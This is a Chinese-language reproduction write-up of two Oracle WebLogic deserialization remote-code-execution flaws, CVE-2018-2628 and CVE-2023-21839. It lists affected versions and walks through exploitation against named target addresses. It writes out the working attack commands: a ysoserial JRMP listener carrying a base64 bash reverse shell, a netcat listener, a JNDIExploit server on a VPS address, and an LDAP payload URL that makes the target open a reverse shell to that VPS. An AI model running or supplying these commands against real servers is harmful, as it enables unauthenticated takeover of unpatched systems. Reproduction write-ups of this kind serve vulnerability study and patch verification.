Oracle WebLogic Server是美国甲骨文(Oracle)公司的一款适用于云环境和传统环境的应用服务器,它提供了一个现代轻型开发平台,支持应用从开发到生产的整个生命周期管理,并简化了应用的部署和管理。
# CVE-2018-2628(反序列化、RCE)
# 介绍
WLS Core是其中的一个核心组件。攻击者利用其他rmi绕过weblogic黑名单限制,然后在将加载的内容利用readObject解析,从而造成反序列化远程代码执行该漏洞,该漏洞主要由于T3服务触发,所有开放weblogic控制台7001端口,默认会开启T3服务,攻击者发送构造好的T3协议数据,就可以获取目标服务器的权限。
影响版本:
- Weblogic 10.3.6.0
- Weblogic 12.1.3.0
- Weblogic 12.2.1.2
- Weblogic 12.2.1.3
# 漏洞复现
目标:http://139.159.221.73:37058/
工具:WeblogicTool 、ysoserial、vps服务器
- 检测漏洞是否存在:
- 漏洞存在!在vps上下载ysoserial.jar,启用JRMP
- 开启监听端口。
由于Runtime.getRuntime().exec()
中不能使用管道符等bash需要的方法,所以我们使用base64的反弹shell形式:
java -cp ysoserial.jar ysoserial.exploit.JRMPListener 39170 CommonsCollections1 'bash -c {echo,反弹shell的base64编码}|{base64,-d}|{bash,-i}'
同时nc监听:
JRMP攻击:
成功反弹shell,复现完毕。
# CVE-2023-21839(反序列化、RCE)
# 介绍
WebLogic 存在远程代码执行漏洞(CVE-2023-21839/CNVD-2023-04389),由于Weblogic IIOP/T3协议存在缺陷,当IIOP/T3协议开启时,允许未经身份验证的攻击者通过IIOP/T3协议网络访问攻击存在安全风险的WebLogic Server,漏洞利用成功WebLogic Server可能被攻击者接管执行任意命令导致服务器沦陷或者造成严重的敏感数据泄露。
影响版本:
- 12.2.1.2.0
- 12.2.1.1.0
- 12.2.1.3.0
- 12.2.1.0.0
- 12.2.1.4.0
- 14.1.1.0.0
- 12.1.2.0.0
- 12.1.3.0.0
- 10.3.6.0
# 漏洞复现
目标:http://10.128.6.148:7001
工具:WeblogicTool、JNDIExploit、vps服务器
版本:10.3.6.0
- 漏洞检测
- 漏洞存在,VPS开启JNDI监听,同时nc监听反弹shell端口
java -jar JNDIExploit-2.0-SNAPSHOT.jar -i 139.159.221.73 -p 9090
nc -lvnp 7777
- 使用WeblogicTool向ldap服务发送反弹shell的exp:
ldap://139.159.221.73:1389/Basic/ReverseShell/139.159.221.73/7777
- 反弹shell成功: